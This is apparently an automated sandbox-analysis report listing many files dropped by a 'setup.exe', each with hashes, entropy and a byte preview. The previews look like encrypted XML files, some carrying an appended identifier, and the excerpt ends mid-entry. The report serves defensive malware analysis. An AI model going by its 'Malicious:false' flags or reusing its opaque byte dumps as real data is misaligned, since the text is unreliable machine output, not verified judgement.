              SHA-512:864363ADCD59A750F9F3ECB0C3C0E8C32736D10C0D2A2A6ECB7BB7D8C65C757E222BF3455CE1A21D14166D9369931BD51A2F36F2EB5119322A46E04076EDA71E
              Malicious:false
              Preview:<?xml.. .O.."...Hz..9.\.=..]..t......`1....Ri....L.hK.G..y).i\FR...Arg..\a&y.pc..mf..V..)I....:...G.m@....g.xJ...{.....K.N.R..4k.-.1..d..T1X.Kq_i.!..7w.A6.^..V0..6Q.Q~.(..4....d.n)0Y...fFs...[...6Q.0...A.dH..J..h.............%=>..-3.."....R.../...Ye....k...7.U9,.....an?Q 36..'"%.P.."..-.a..y.m.....9S|.@.no<.LJ..=...X.0.....a......?.4.j.....,i..-.J[.iV<>.w.J.7|:l.<b.....GB?h.!ua....=Da[9..}m`O..wc3..4?...{.....K..n.au..D....x..}.X.:'a.s4e.I...3..?.5...U.......V.kh./..{....%D..AV..R.dM...(#...p..#.I.[.I+.,....1..b=.`.a..LVV..'.....VS.W.V........3.7.....e...V.s.QR.((.Y.V;._P.7.Lt..r?Y...C.J.@..'....2.?.(.i...F.a.....W..)0.r..9Q..s.....'.^TB...I.S<.2.0.....U0.gv.6.s...@..,5...w.A{.lc.H..@.....K~$?.SK.y_./.K.q...].N.6qV.#.:h........... .k.x......n...X........54.#.9c.......V..C.._.....W..2......q...O.J..b........QC..:.A...b.F".!...=B...3.]...n.#....b}..O.(.j.k"Gc.[S.=....srF...?Y. ....R..H...t..J....YZ.).%Us.Q0'...J..r..K.n...I.@.5i..2...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1387
              Entropy (8bit):7.84493671904972
              Encrypted:false
              SSDEEP:24:4YgbqgBck+Ws9M6AOxPo7Dqbk4RxMJ8xWpQtdylVI0w4j28FzuUZbdm7T+VpbD:4fqgBdaM6AYQ7DqqG/l8FCUZM7GJD
              MD5:57956A058B184E8F6528C6FCC022D3B6
              SHA1:BFFE4062C75FBF57C308B864BA2C15CA4268CE5B
              SHA-256:7354F6B942DE2C1D4DCC80F4FEB1E17CD16E77EE4AD7E306932F699851C05F58
              SHA-512:16775F0DB0FA093E0710657BFA07F0699F698D373E170F4A697CDB9E8233DF397A93FC2C843B591BC30D927682F4ECCE0CB5D711CB73ECCB47EE8F8415B514ED
              Malicious:false
              Preview:<?xml...Rl-i....:.p..p.......w9..TZN.<"...ua.[..9..K..f..z...d.t.......N.....6.T..DlJ-..2...L.....>w8gR0.;/...?f.@.L(...=..&....c.+...=.o.R..6&3./LU}..q&..u.*s......cJ..]Y;w...f./......`.a.;.zbD.O..SD.>.eVv.....#......al..s......tc.u..J..~.n....<nU@...@..Zf...(..o...8&..'..B...W..Ee;..Q...E.e9...f.<O...f.CL.-...]......-?.....T.`...u.=Z.X.k.....?..rw./......(>.1...A.....}....F..6:n.p@.-....>....,...4.1#F.%....R.;9.A.f..}.9._...y....@...^......m...X.;J..O..@.o....J..d.-..F.;......5...E.j....H....f...u....=...C.{.l.L6."..GT....-.p4Y.<$K5..6..U.I.o...#..o@..x.|.}0|..Z.........I.-.Z:.Wz&....T.. -. &.._`[.}..$/[wL.;........e.^..t..../..;n.).X:}...`...>..kU.f.:..8.I^..z...%f..?L...`AC..U..e....U..g..p.!.Yg.w.I...........Q.....8.&._.`..P.:...+...Krm.....{....t.....V.l.T.&....i...r....S\|.D.......;.".;........ ..9h)....i..3.-.6n..Al.T.4... .. .f~.)T.D..#Qr..^.s1..bj.'..D...8.h.Z.{.=t...U.PYw..X..E<Rz4.".._O.}zm..)Z..G<S..p.`.C..C.......[...V.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3024
              Entropy (8bit):7.938720574586192
              Encrypted:false
              SSDEEP:48:LIWquH5u2pW9j/PVY4LzA1XdfsSBOvp1x/GyUptplxbqlk1kGY30vt9+SVTD:L2uZKV/Pa4LzA1XRsoqTdXitdqO3YEl7
              MD5:B1DDE35465DF1B44430E02FA31CB716B
              SHA1:303C56ED0DF65B09906A6B079E1EDD78A232748B
              SHA-256:6A8BDFC5FFC78C062B2831469DC8941CFA7E3FC257ED9F792EACCA7AAF8B934C
              SHA-512:BC3948559A97733B21AA503066FBB406AD58F3D58956E04940956B8A69DA77BBD8818773094D813ECD15A7C7431D032EE2251320B6DB2773642F2C8F2C1502AD
              Malicious:false
              Preview:<?xml.......SX.bI...0v.....]..^..mZaz...cA2F:8.B..~.QJ.O.......I...k.:.......lJx.......z..$_....t+..P.....B...-xxg.?B...~.>.Mv...`.$..nYWiay.C..7c.g....ZB.*..%.r6Q./......k..(.J.K..h6....[?v...8....g........|.L..c.~.fx....iB.....;~u2.Lg+.;a,.I'.2KJ$.p]...z.rJh.M.....I.....<..`A.....x.>...)g.A4...F.u.@..._&Ada...ss.Z..+....A.8v....i.Db....f=W2....`'.s..K..;.EB.0...}..s.u..p....e..)..%O..V.... .Tx6..o.{.'.y.....p.Sq.<..;r.k...t.;.L.1.....WN..x...%..N...+b.'..:..t..\.1#.q.Y...z.N.....).t.w/.....w........_.L..^.. "..z..............&. K......3........4...>..7H!..i...-....\....w...y...3.z(c.<h%.tA..j.#..!...c.C.....q....$...fB....h....h...T.Q`.s.....j0J..8>.D.9..k...........R.].^.oC..M...q.4.o.2....@.mqr.... ...."f^...P.N....S...^).3+?.\.......y.+..x.}....j.-....;n.x...0.SN<W..702..Z.d......Mv.1.Z.&sP..v..1...;9.....?:.+.S..vP8...k...=*......W.h`.f.K.....P..\[.O>....4../..)i........a.....6\.:..-.../..OR8.3E.....)~.*...#....@.Y..%..^.t
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1675
              Entropy (8bit):7.882053339053723
              Encrypted:false
              SSDEEP:48:VGGUK6046dY5CTRHUxULv4a/gW+aBSQjfVLD:V0046FT5UiLh/r+K1fVn
              MD5:979F0A93C4FD450A091277BE66AC21E4
              SHA1:20DE154742BE91DEA83E980A5D61FB5514D89316
              SHA-256:E2AD0BF028943E0321472BE64E448E628F40106F8BA1B7C7AA0ECD3D7B4F05EE
              SHA-512:18D626F9754EB4FF3E2D4C1F5D78EA5C302396F3BF40A3592307CB694BABFDDA87608C85AEED0C1DEB0485DA24BE8304B619C36D479561D83F1418E7CC635DA6
              Malicious:false
              Preview:<?xml.........w.{>....{..,s..:...:.e.y...OV<^T...H..s.V.w..)..E....<q.oZ....6v.$j....O9...l.....Be..[.S.L.<2|..z.........z...E........J.....uQ.......n.Z2.oS%(.|.I..XX..g\/3.q.^e..]..H..GN0_aH.F..aH.q.A....O.`...,W....V..lO.*I\nZ........F.8.).<...QUuo.I}.....M...S...".@.......vW.......$d.|.Pbx*M....Ty.T6*.$.WR...jW|..........U~..A&@r...qw."/uT..x...RW.....m...A.:$..?...=jq..y...A..|v....x-....1..O....J.).....5..7...._..k..F...C..k77...U.N1...=|..i.)1..I\2J...........s.u&..<h,.....C...R..j.Bz$..iLb.9..O'.dM.......[x...<...t..--.c. ..C..W_m..\...y.a..D....k....%..m......[m.#V..a=w#...#.#9..!x..2.~..M..|>H..L..4\..w`..O!..^..#........?...j.\..E<?e.09:..G.`.......U..!..\gTu..!.c.@!.2.mg.N.JBy)...;..k?82.....b=.d.?..5b^...`lt'...DJ<s.Q.>y...].O..pO.c......|0....!.o....+..z..%..M....p...0......R}.k.7.U....Uz....N.q?@..N........R.....~..-Q}+Y.8qN.K.".H.e.e.X..D.U]J....!.2%r.+%..u.R.].=..*8...V..\..kp....L.*V(..j.......@"T..g..^.wBy.&..OU5.....+.....R
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2113
              Entropy (8bit):7.8998619280525295
              Encrypted:false
              SSDEEP:48:uwR84n6fNeBV6jvtg7MXC0YsIshAh+q40eRwopGLLFKD:uwR8dNxjEZ0DhA5eW0ELFC
              MD5:D894F33A7E815B38E61662DF9042C2EB
              SHA1:36523F5DDE7966338402665EFEA4553DED2BA004
              SHA-256:E2BE0CF49E2F468994EAD1F4F096697F820E15A703C75540CE0C127A0EA9C2E4
              SHA-512:68BFC61908461A291BB309D5AA152768213BD014BA47B00A83E06B6CA0F22584ADCA5ACBD1488A275F4282660776BC30E0D1DD7FC4B3AC7D3FDF50C6B4F8BEC1
              Malicious:false
              Preview:<?xml0A.%#...{3d....@...~-\L2...rR..`...'....h.b..'s.......fi$o...j....O.V.......;[.G.....t.....{...*.....m...I*..Q..n.....P.E..lU..Y.......h.<.)g;....o...(F..Op.-.....x....@...P......]M.v.X..J..H....[z..G .D...D.z8.8..j.;.....R..KC......>.s....8.s.C...bY.fb..+.b8..C.....Z.5..n.RCv>).0.............!b.qJ.dw..L....P i..'...#B{x{.mc5 ..Yf....#.w.l..'..t..... .9.z..S.KA=.....8.......{.]...=..n{....E.e..C....t.u.S....I..... "...B<zH'z.Yu<.:._tk7...H$.?j..h.5..C.|,...PoH.....k.kU.-c3.R".E.....S...z......k.......J.3n...N.1&.5..&....m..E..m.XB..$.yK.<).sHG....,...SS..x.U...|\P.q+w.r..u........... J..C1..NY.. /....o=......M.'..z.!..n)...y....3W.Q...........L..dvq.#.G5.'....w...9..%#...j..U....e.\.@"...p.C..T.~..H..A$.v..7....N....g..fe..(.2.o...)..L?......Y........!C.......A:. .;7.....o...(@*x+U.kE......{Q...f..m..vy...h....8....rX5.M...`...@^...,[............T.?.8.Z^.v,TB.s....$.0c.........;....<.x...Z".*......#f2.j..a=....(...6V.....V..."
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):813
              Entropy (8bit):7.717762776052287
              Encrypted:false
              SSDEEP:12:K8ycLdnOb4CwLBkLsS5hIhd82XXShU5/UQ3ERWKVDxJZ4im5/3CNnCqbCsMR2ciD:IcLdLfNfH8ai40VJZ4im5JYjbD
              MD5:42A983A1194D0B48581A01DC0EB66DCA
              SHA1:2FEA3F1007F4663D42DC29A3B13C5E306C3CCDC8
              SHA-256:41B9224716111D36E4F11B6E9C78478DA21850FE6823E8293026C89C1DA1E8A8
              SHA-512:1E6F2FDE19A7DA5904F09597340132A4BE89F0A013F5515982DC6C423D681CB29CD83E4F874862472CF6E25CE06D81F5F583C1A028FE16AEF7B92368CC2EBC5E
              Malicious:false
              Preview:<?xmlp..?..T.`i.p...........w..VLZf.Vi...9.g_nM...O.B...lul.O..Z..^.}..\..u...@.^4..<.6hj.='.c.E.....a.....q~./AG{......sz.Q+u.7.#..t..{.e>...,e.'#~.{^Y.b.%y..^1]i4M.c. .;T..~r...R...:K......~...@.\.OL.t......Yid).9.....[.t}...".!..l.I;R..$....5$.EZ0.S2.......H....s.F%5..3...b.....i%.v.,.:...3...u.v.F.........zZ......!.W..D.u...3...U0..gF.HP?..j.`....I..p.Z..~3..v...Q-j...*.4r.../.2....~....Rh.4e.7.$.3p.......#.j.E....?E.....J...'SL.2...0.O<..A.....#.&c.E.F.^........i`...P..%{..p..M......X"...`.w5l.....8.D....VA.#.#.~Ix[m-k\6N..wm.Vw..y...'.........V.o}..'-.s.C.FhO;.2..5k<>a[...~=.g.zQkb....5.....N0.Pc.e..k..(..]..W.`A....Lbx..I..............F..B)..O;U..A._...q.|.7f..-.a..c....O\.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2070
              Entropy (8bit):7.894023489404259
              Encrypted:false
              SSDEEP:48:ELdPtoIaGZbeXqNTsUpTxeDuKmoY/VzVZIquBUdGPleLCpJ/0VyTjD:ELd1oIbe6NTDxzLZIquBUdqlCCpV0VAv
              MD5:3FACF06C7ADEF41D8B16DA38BDB26432
              SHA1:77DBC8E399D9AA19DFDA3E92BB9CC4D55BF6BBC8
              SHA-256:E1A1793E28E86C73079D7000B01B3C1D5029DBDB560D8A0843CA3630A541D2F2
              SHA-512:1CEE66EC3D9D79200C825D485C3AFBEE4850E6B6E625B08639CB699113C5479F63F856BE8C6B1E2FFE2001BE536B9E888F675EBCB75E0CC937C0A1909C552D56
              Malicious:false
              Preview:<?xml.a......._.._sq.'..XpG&...2.}~........'.[.7mk..y...o.G./.z.C......vW.X.q.G..u..9..(..U....'<_r.82..~.d.o..h.J...|.-.)...f..m@...*.E...b.......S...~.$.J...F.....1....$.......4V6.wv.lus.i... .`..t\s..i...1F{.^..v...3k......$.=.4<..<...L/^oIYP1..1....b.3........].C..B7.....:Z....#}*..CK..b)s..^...dp\.|..2.h.B..VZ...~..*yZ.=..T.....}..a...u..c.....(^.sbq......v.`....]"v..#......0.fd.0.'...M.Q3.D.s.......:D.......Y.._x...!..$M...q..%.Rh.J....~.$y...Y.a......^..^.(*...!.x .8\0._L.}.q.9...=.Ed.DzhG.p.V.3X`l..to..![..).SZ.+.wj.Q3K.__....F1.2..._.*mo"+..4.=;..pZ.e......4$Z(....U......uV.R...k..aa..<..G..a.j.C.og;<q/!S.9.p..u..2..._>.[N.+a......L.B..C.%..4...A.....g..../....D..lZ.W.j}...y.......WoI_'hy.DF=..G.K.....?ZN...Q.s.S..-L.l..^.Y .....)....J..3..uL~..>.Xl.."t?..W?..A>......BS,./vr..%.Ts:v._.^.=p.k..8....d$.u....D.........!..QO~.,........xT......$.....y(..$.:..&...Cb.]..IG<..."...Q....8.jE....,.Uvi.Tg{..tNw.k.$....."4.E...p..fO..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):789
              Entropy (8bit):7.734650892694243
              Encrypted:false
              SSDEEP:24:IPEvDcs0MKl5gX6yRUc1+sGtQWL443/MaYbD:gEvYo85gX6yGcCvb/xCD
              MD5:773E2BBEA4816A2C3C24ED0A788B6080
              SHA1:F4050C6A31ABAB22DFE007FE64117164FB584088
              SHA-256:1CB2D5F4B018CE4B9971652FDF88FB2C7BD70B20A4851FB9D4D26BA40069FDB4
              SHA-512:9B4BD3E492B76CFA229C175D678866DC6D550FE08D145B6A00897E4CE429B65DD2AA3FCC814971C56D5728AED45B68456FAA0357EEBCA13C717144DC294DAD3B
              Malicious:false
              Preview:<?xml:..Nk.?:.Z.....C|....'.....`..p...{.K.h..K.3;w.y$g.....J.X.....s....%9.8.W.,K..J..!......m<....RU.0.(....:Z<!hKv.Xh[.u{^....zG.....an|h....A.=..TG.<......S......E].8..|..IG24k.Y-....z7.f./....q.bpL/y..q.9...+..n..h....djs.....1.WZ2.D..,yEa....o..P.....L.S..M....<e....v.F...u}.+...-...dB...d,....$...%."..(W.J,..R.......#7*fE.WK.>..*..y.?...K.l...i.\.&'q...K.....`9.8...B.p..{=.Y.`T..HO.*/.L.....a..+%A.:c..]^y.....IO..=_-.9".YRL....z."g...6.....00.:c....d..........E1+.>i.-vS...m..L.g..W...$.L..:(...IW...E.|../....:Q....$.BOA5.9.=9z.1z...6a.?Y.G.U.....N.........i.]Z_..._=&...Efcpa>......M....B?..X...)....8....."..0..."..Q..x}....V.t......5#h`....^C.o.g.Q.6.j.&.T..^.|P_./..s."VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3017
              Entropy (8bit):7.93725523400883
              Encrypted:false
              SSDEEP:48:01PcwXgqz3IA3fSpujgq5Ftbl1UqnM24rQEF43eILJvCdBjJ4/nul6KO3wIWmvK7:s3gqMAqp85Ftbl1UqnciBSBrl6KO3rh0
              MD5:431D6EF5F36DE1B000EEF69484B03E19
              SHA1:6B06976A833F10114C2EF312EFBB59C2C5D247DC
              SHA-256:518257CA725258880AD268F1A1FC3ECDD935B659D2543F38E0AD264C0EE17269
              SHA-512:0B6E292B3EF1187DFECC8CA7F8EEF66868BB9D71978A6EC8C121DBCAB800B463AFA6F01A61AD37E4A84CC7070A5D41730CF8799B58A97AF657815E6AE0C9D0A8
              Malicious:false
              Preview:<?xml..`...;e.=O......;....i.._..jiLy.JHz....2.`...e8/..V.n..c....R.&z8.8>#.@{.. ..p...%J...-..{..X............g.BL..........r..Q12...Wx...A......18..^O......:iF-'.../m....CO..k....s..+......I.2Z..[.o.1.4.V..f...Pp#`..d.....+..f........C.#....V.U.....F.T.W..:..th.....~m.w....g!j..;.e..b.>.Hm..x.8.n~..KS.Gx5<...I.."=3..`y{2.\.C...y`.hr.y..D|...e.j..^-b.jn8...v......t;Y..V...\..L......8v..1.5)r.>i..n`.T..F.....{j..r...nt2...K.|.)..]...d.......SW.....2t...A.....*....h.H..,g^k'B...w.p.....].....l6..4.>Fdcl.r1.Uk.~!.3pf0.^.....$.=.j*..H{..Q...M.G...K......... ...~....]~.........AZi..F....cz..%~...hXm.`...s0m......2....>.el.p.()...W.m.J.<.s.R......7...h.tu..!....u^..k."....q2yZ)....f..._.D[.,O`Z.2/,l.....\..RX...S.....f3..&.b....#A...@V....D~{..gw._.*`.P.'....o-....C.3s...Q.s..Cc.|....+...n...G.h....2d|pDA.8.o..3.gi..q.....y..-[..C....Xu#..^...F(...T...-.....wk..U.#..3>..{.>....f..g>LB...!p(...7.>.J.|..V9b6z..o..yK..s6...q.......*..:.2..'...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3017
              Entropy (8bit):7.928207659961935
              Encrypted:false
              SSDEEP:48:HhaGbIX2w/3Up1gESkPnF+2PvoIMMcPo53fIAsAzxSoXkYn6Qmk0pUlj+r6t2D:HhaNP3UAESj2xMnPoBMAzxSoXkYn61k+
              MD5:026B57C43410F9C608ADC8D76B69D6C1
              SHA1:16260F0F291D5FA899E593F11F5254A5D357003C
              SHA-256:0A8FDF430DBED5A48788C47DFF7706CC5A768BF761242EB69A8D7D5002DE0BA2
              SHA-512:4FF706053A1A38AA3F34441B996E164B0EA438CF58E7FE399E253971633920A64F334A7A8223B8CD927EE582FCD5E55398C8383A5AA96BC0CD3EBAEDF20B784A
              Malicious:false
              Preview:<?xml...].YlaA...#...MC....V^j%......9.P.8..[sG8.!.y.....c..Y..a...f..n...M5.^.L]GF...).8T...'..Fz.Zv.<.+....0.R.v#....D.T*..`:..../.....8&f.Q.K..A.|h...p... Q...*=4.%.D.r.a..6..{..A.-..O...#....-.R0.$.b.......%....m..4..9..mQ...'e&n...^o/.\.G+B...Y..o.0LUCm.b..z....q.r.......(..).I....-..\(OJ....q.A...}.,.:1]u.I}..o..EJ.hm.zM..u.........dR..+.>.A..<....-...o..nT......C.7q.)..^.I..v..#...*V;5.I9K}.3.e..)....!..c.>{C.(.ps2..-..j:2......=...I.j&n...L...%..]..-.A'...#n.....B9..OX..zw.vS.*I.....E0M.K.p..E.~<.....y..@..g....2.>].g.....`..C..![...R...+aH.d.9C<.........K:.r....xH...-...Q....X.{.ZV..-.K.8..5..&.|'G..B..?.......2^....@<..|}.Q=.+.`..Aw..2.Z.|.~.....X.D....+.....a`_..b:...%....+.T.d.}...L6].(.n.;K..!...!b...J...Q.......-s.`..k..c.x....._L..T.y.....0s4.t.R..a..O.!_..&.U..sj<h.a.w...6..f|0..^.".s.+Y.-..b^s..A....cr.z.I....8.B....e..M..@Q...Ml..7..#."..w..Nm..#p.C..,....Q.:....~...3E....V..2........R..N.U.h|?gk.:....p.>6.,G.i.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4639
              Entropy (8bit):7.954423156977016
              Encrypted:false
              SSDEEP:96:1vrW05caAx06RkgQKmX1Kz5tUu+CBKaCJasi8ymgx+EAWSkt6:1vrz20KSllKzjj+LJasNO+E7Skt6
              MD5:F7CD4EF3D40A47352DEF4BA8501CFB36
              SHA1:C7E5913C2FAD4C3F4A489BD3094BE187397B24FA
              SHA-256:018F5CC96B311964B280470CDFA971AE7798C96169AC94FA91F3CAD8FA812307
              SHA-512:198880E8A9B6BCE77A5BE04EC0D469A8F2CA25BE90F2DE4B8BC0EA66B9F7AD65CD7572FD2F6ECC33F5833F9DF265CE7FC88C40857D3E79AB5435EF65FB7520C0
              Malicious:false
              Preview:<?xmlW..B....Z)J.......A.h...l......lK...^..X.^Q.A.....Fy=..../1.7YF.P}8...O.H*o.K.,...k..%.v.n.v..pX....,...L.O......64.:.Hl..... b...5....@_..OX.,bhArM..Sg.6......u.l.../...#/......(I....7...r.......g..q.-...I..~.c..YIhS)_..<8..GI..;}..`B...o[...".....;..Xk{s.......u81A.X...H...R.}.U.......#.\......:S...._V0..Gi.....[zG.{..d..0W.L.g.J}....w..E>..l..y.._`.P..kb..N......U.u_U..7....&%...5..... zg.O...|...8.W./..g1..V.3.z..i.$.f|....(..<{..F..W.p." 3. ...]N......#.u....$/..S.]..1..s..<...z...._f.n..:....P..=...|..2.W..Ya...F.G....#&..d. 1.B..Fc.P..x...)...P.......p.....yT.?\;<R.@.JFnm?.d.._.T.S%...<.=P.K.%z...~KQ.5...}KW.[..Qzd..hNm.@..L..Uj..+5.tT&..Y.I.......U..a.....}..A..5i.Q...0Y.(..w........v.g......wJ...e.vL.......c.T.S_v..:D..J.>s=..gp7]j5.<D.....7.S.6.l.4..r..<.)..^..Z........qNJ...Q=-z~x..>..l..2...8Q-..lG..O.p.6.@.Z.......Li..0.....:....yv.+^m.H.{@(J..x..lg..NA.....7....T.$...;+\.1.|...fpG3..............9.V....8.g.5...d.{Y*...H....J.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1329
              Entropy (8bit):7.838510984388582
              Encrypted:false
              SSDEEP:24:5K1KfCE/tgrKtwxmSt4+SgDNFgUj1J+IfTlCfhZeKfi4pZ1kaWjjh59FHcj280r3:YeCg+gwTXXZj1JLTlCffTi6MaWHBFVNh
              MD5:2003C7A53F6E056DBD59ED28B3D62C5A
              SHA1:4E46BE4D8A73387457F385ACE490521AF32BB536
              SHA-256:980C47E475D012EF03FCF96782533F2BD1749E43BAC414C317AC69A706D298EA
              SHA-512:E01C5A2E24D5C18AF43E82E2197A87B3D7E8E1D6FFB0D33FEEACAA94A257E4BEDFAB484AF9E1FD7D70F80863DC77011F6E0240D1D4EBBE48DBE5BDB7320ADE4F
              Malicious:false
              Preview:<?xml"..88;..:......... ....4`....sUm..t8...!8...........z.=.:.}tw#.n`...j.~..&._s..r.......J.5C..V3-c.D..H.ri..p'......dC.*{.s.{.\....}....a5O:q)....i..4..S../E@..g......./N/sC..[..c.jd.6.Qu..q.....4S.:...../e...67....s...Rp..<T..o.^....D.<,....4Z.k`@....r.!..s.}#.Y...d.a.m>..l.T<l^Q..Y.<|.5`!9.:C...i..gT....h.H..Ru|3..S...X..}.}^......C\.<.eaB......=.<(h1.4..p.R}*l..+z).l....q...x...!...Y.?.#...u$.x......Y.......Z.H.....OR<....R.v.DT.g...Z5N0..0......X.j....eQ..y..~,>i..Og.5P.u.2> ....w.y..jIo+C....U.~i..y`)..)..?..........8l..*n9.n0.9x......p.......:mh.....`i#...q.>.Dy).6`)...H....Ew...zU...0.7.....qQ...`......B...6...;q........k.G[..6CZ...C]T.Tfq....$.j...C.$AQ6.kn...o.;.>}#.H..s7.m.G|. p..GG..#......>.JM.&!....6...........L`....H7m...~.d...t,.^Gl.x...s.............Mgd...<..].....p`m.],..j.1.X[.Q..`.F..j.p...8F0.QE....;...A.b^.9.h6'\A....^Z...d&......q..;...|..I<.....R.Dy...E...K..QGHNf.[......c....KG}..,....iQ.........".
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1395
              Entropy (8bit):7.856798571225127
              Encrypted:false
              SSDEEP:24:YUPdjxOrTj3mQiH4Sw33UjPF8Yzm6i7qTkvarsOU27QKP2YeiMX7Gb0YbD:HPlW9HqC37qQvaKs2diMXi0CD
              MD5:4B0D6E3538EC8DAE53C7009E39C1B1EE
              SHA1:C3953073AC08B43441F1128B0CF81AC03A027C2E
              SHA-256:01863072ED3EABBA6B7B18073651E48A2CFDD1E81AA36599E106BB04C8038FFF
              SHA-512:BF6697769A18AF39B3FA88E4B55DD1C674E24E31421E8C0DF31ACFB7ADA19FEF407886AF099A57E0CBEEE921562007DF98FF8550186198A7CC2981247E8FAC09
              Malicious:false
              Preview:<?xml*a ..Rs....L..x-an1.R..H.o9.?....*....hcE..f.".c...Y.T.}..([`....U5..5g6..\.?.5......O...5..!...V...d.L....>..<..u....X..}....a...)z..@B.....w..:.B.i.oJ@v.......5.xE.(.... <.,v.{........3b^`..\.|.:,+.HQF......b.....dG.."f....]....f...v\Q.).L.`.Q..Ki/&.....:_......Y...@.t.#..*..|.B.~.<w1.G!"*0......a......e(.........hJ..%..=...(.F.8._....>.....{.1......P...fLS...<..[m..m...Bz.8`.9.G.....O..U];.u.dwr..............\.7i...>..H...O......b....|...m...).$&../.K..M....4.W...M.s..k'Cp}.%..Rc...X./.#W....Z......Z....[..I.k...z.;kh.b..S.o.F.h.....l.,.kU>MY..i.....+......dT..lA5...vx:.{.l|@Q.F....0...*..J}..X..r....f.I.FC...s]^..D.7o.x;T..+2.U\..A..*aG3..b}.G..I-y...a....!*.>.8%L4 .i..J,..<...cI..5.J.]?.8V.`..$..<.d.....A.Aa.vB".{.%6....[=.T...b:.c.y....*.u...N....Unz...9.yn...q.G...,X.#ED&t.\v,.2.G..O...V.Gb.(( ...q0.h....O.i...{.......0c................~.{G......p.Y.....O'z...MR..r..{5..u...f}...r.i.'B...%.F.H.).F......a......0l.-.al.s2p
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1124
              Entropy (8bit):7.780093523213389
              Encrypted:false
              SSDEEP:24:klbl/Mn4+cyoidVk/u6ks+vf1j6bXac3C0J51qbD:Sl/Y8i/k/2bjUXxp1ID
              MD5:43B7C33963997B4DD56F2A6197BE2EC7
              SHA1:646D9B85EB402C16D6BD14975472952540EB3908
              SHA-256:3016F717DBEA657EAD308DCE3B00DF95B7BD91ED0999E944288A74580B630FE4
              SHA-512:4FA3351ACFCB5AC5FB349B4BF9078960635950BBCED17A8C373B96BF133FA245063B6A532EAC1B69AB9530DAC213BCF0FBE9720D3253FD88D3982F4D9B7F835D
              Malicious:false
              Preview:<?xml.....&..e*..0...-V..q..M...m.|..B....`!..r..X...XUH.I.s6....f.R...:!x.kk\.#Y.k0`..;1...t.69...K.|..f....n> =......-=.p.....N.....-.H.?.o..........j,c.5..O..0..........;...4.E>X...>...l.+{.<..).S.T....v...7........x....1.S3A..n.......T.j..qr...s.K..,7Cph..".......K6.........H...@8.g.Z.$...&...~o"B..w.Ph..t....+.~...$.c..~$....pR.".A.L.N.... ..d...t.....fyx..(gt&.....O..G...V....p5..t....P...l.........L.b..QLU.y.<*.......ff.m.,..;.S.l.........t.(.m...c..6..R...Jg.Et.....vU..H.....m;y.O.@.e.XJ.&6O...bU..R.....3.G.oo7.4`...j...6'IJh.m.c.Nfh.....zA....=.C6.d(BJ)...)..;.6..G?..BEk.QX!p.97.b....}7.\58.B..~(P|...J$c.#"6..G...h......@.:B..C.+2k...n..(.z.o.D]....T`.C......^..e...x.@.....% .k.X&Y.%..ZR....^.)..P~RR'^...W.b...>......)..F......X.Ad.....a..x.-0..p@O.w...Y...U#'.BsH..c.Y9kC~V.F....?C...zM:...i....w....~s..7.7P..F..V....I..O]<t.n.......$.K..f.... "...P2.dm4..a.y...f...l..]5u......UB..j.By..;.w..G..G...7\b.0u#.......0gpi5.z....5
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8769
              Entropy (8bit):7.978451639247125
              Encrypted:false
              SSDEEP:192:hJsCqAl7jpntSzpEPJOYTOpznX1YZ1NvTUez4sVR4QtJm8tWVI:hJQASVgJOFpzn2tTzvR4Qbxf
              MD5:DDE5D231A6ED26812A75C8314CB31617
              SHA1:81D26BAD326595D7BBC5810C0C13F466FBFEAAEC
              SHA-256:A581EE794393409F2805C8BD3EB55815A8AA371BACCAD6E2D3DB80C2DC2C1A1C
              SHA-512:55F14B8AF2E4518937B9043EE35F3D35525C3CC4437F854583D5A54EC78A4D3C94BDD8B993A6C45D2EBB2BD6D0097097BCFCECF799F0A46D9C2CC994A75FC3B6
              Malicious:false
              Preview:<?xml.6A.....N_...r.\z.....L8d......;./x.(&...1Wo)...b.qO.<..*............O..@R.f..]4.In............a.h...ah.I........u...iy.RbgQ$W..R...}\.k_...}.{..d.8S.).z.5R........6...^..k...+.##.#!:uAM#=!.)...&....(.\....6...f..j.o....=$..'A........$..5.."y.....$..A.o..a.e....#i.@4..?4...X...o4{4..&.o..7'..Tm..v..<..>P..n..8..&....V......2.v.u.&.Y..O...DO....<.r....)..........`5T...?...b.|.q.D...2ef.......N.x....J-E.2?..NvL.\......i%..........P.&.[..+...W...o...6#.1...2.){4.......^(SQ...f...2...p4.F.B.vS..........g...TZ..ia.B...~....^.G.&.7..........|F2...xQ........y=.A..b..P.C.Z..E.4w..Cp..{.......Va..`..W:.qe..|F0#.*.p..W.-..?......X{.......E:Wo.z..Z.j-Y.;.'M.q...pR.iUt...W.,.>.P.{aq..)+;.....=IQI6.....fO$.....Zu}(.#......T..;.....j.A..g.E.q..q.7..^+..H..s;7....w....b.)..".....%...i.0.!.J9..WoF...~v1..f.=.~s$...".O,k..'..z*......s...)LLE.J....|.^.d..Jw.+.%.`]..0..[1bsM4re.Jg..R.6.....\.....f&0.b..W6.v6g..T..h..nIV]..}.cu...h....|..\Q....Y...6,.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):5842
              Entropy (8bit):7.9685959859754165
              Encrypted:false
